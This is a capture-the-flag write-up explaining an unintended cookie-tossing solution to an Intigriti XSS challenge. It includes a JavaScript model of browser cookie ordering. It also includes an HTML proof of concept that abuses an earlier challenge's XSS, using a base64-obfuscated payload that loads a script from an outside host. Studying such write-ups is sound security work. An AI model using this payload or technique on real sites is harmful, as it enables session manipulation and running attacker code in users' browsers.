Unintended way to solve the challenge
Two things you need to know (gotchas):
- Any subdomain can set a cookie for all subdomains of its parent domain.
- If two cookies with the same name exist, the cookie with the closest path is preferred.
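
The two rules above can be checked with a small model of how a browser stores and orders cookies. This is an added example, not code from the challenge or the original write-up; the cookie values, the legitimate cookie's attributes and the first-value parser are assumptions. It goes slightly beyond the text by also showing that a `__Host-` prefixed cookie name cannot be set this way.

```javascript
// Simplified model of RFC 6265 cookie storage and ordering. Values are constructed.
const domainMatch = (host, domain) => host === domain || host.endsWith("." + domain);

// Cookie path must be a prefix of the request path, ending on a "/" boundary.
function pathMatch(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || reqPath[cookiePath.length] === "/";
}

// Store a cookie set by host `setBy`. Returns false when the browser would reject it.
function acceptCookie(jar, c) {
  // Rule 1: a Domain attribute is allowed for the setter's own host or any parent
  // of it (public suffixes are excluded in real browsers; not modelled here).
  if (c.domainAttr && !domainMatch(c.setBy, c.domainAttr)) return false;
  // __Host- prefix: must be Secure, Path=/, and carry no Domain attribute.
  if (c.name.startsWith("__Host-") && (c.domainAttr || c.path !== "/" || !c.secure)) return false;
  jar.push({ ...c, created: jar.length });
  return true;
}

// Rule 2: build the Cookie header; longer paths first, then older cookies first.
function cookieHeader(jar, host, reqPath) {
  return jar
    .filter(c => (c.domainAttr ? domainMatch(host, c.domainAttr) : host === c.setBy))
    .filter(c => pathMatch(reqPath, c.path))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map(c => `${c.name}=${c.value}`)
    .join("; ");
}

// Assumption: the application reads the first value for a duplicated name.
function firstValue(header, name) {
  const hit = header.split("; ").find(p => p.startsWith(name + "="));
  return hit ? hit.slice(name.length + 1) : undefined;
}

function demo() {
  const host = "challenge-0821.intigriti.io", path = "/challenge/cooking.html";
  const sibling = "javascript.challenge-0121.intigriti.io";
  const jar = [];
  acceptCookie(jar, { name: "username", value: "legit", path: "/", setBy: host, secure: true });
  acceptCookie(jar, { name: "username", value: "tossed", path, domainAttr: "intigriti.io", setBy: sibling, secure: true });
  const prefixed = acceptCookie(jar, { name: "__Host-username", value: "tossed", path, domainAttr: "intigriti.io", setBy: sibling, secure: true });
  const header = cookieHeader(jar, host, path);
  return { header, seen: firstValue(header, "username"), prefixed };
}
console.log(demo());
```

The sibling's cookie is listed first because its path is longer, so an application that trusts the first `username` value reads the one it did not set.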
## Steps:
- Using any previous XSS on Intigriti challenges, create a cookie named username, with its domain attribute set to intigriti.io and its path attribute set to /challenge/cooking.html
- Redirect to https://challenge-0821.intigriti.io/
POC code:
```html
<!DOCTYPE html>
<html>
<body>
<script>
// Navigate to the earlier XSS on javascript.challenge-0121.intigriti.io;
// the r parameter makes that page eval the base64-decoded script.
location = "https://javascript.challenge-0121.intigriti.io/?r=j%26%23x41;vascript:eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTt4LnNyYz0iaHR0cHM6Ly9jeWJlcnBvc3NpYmxlYXhpcy5jeXBoM3IxMzM3LnJlcGwuY28vc2NyaXB0LmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==`));//%0aid=origin";
</script>
</body>
</html>
```
Resource
https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers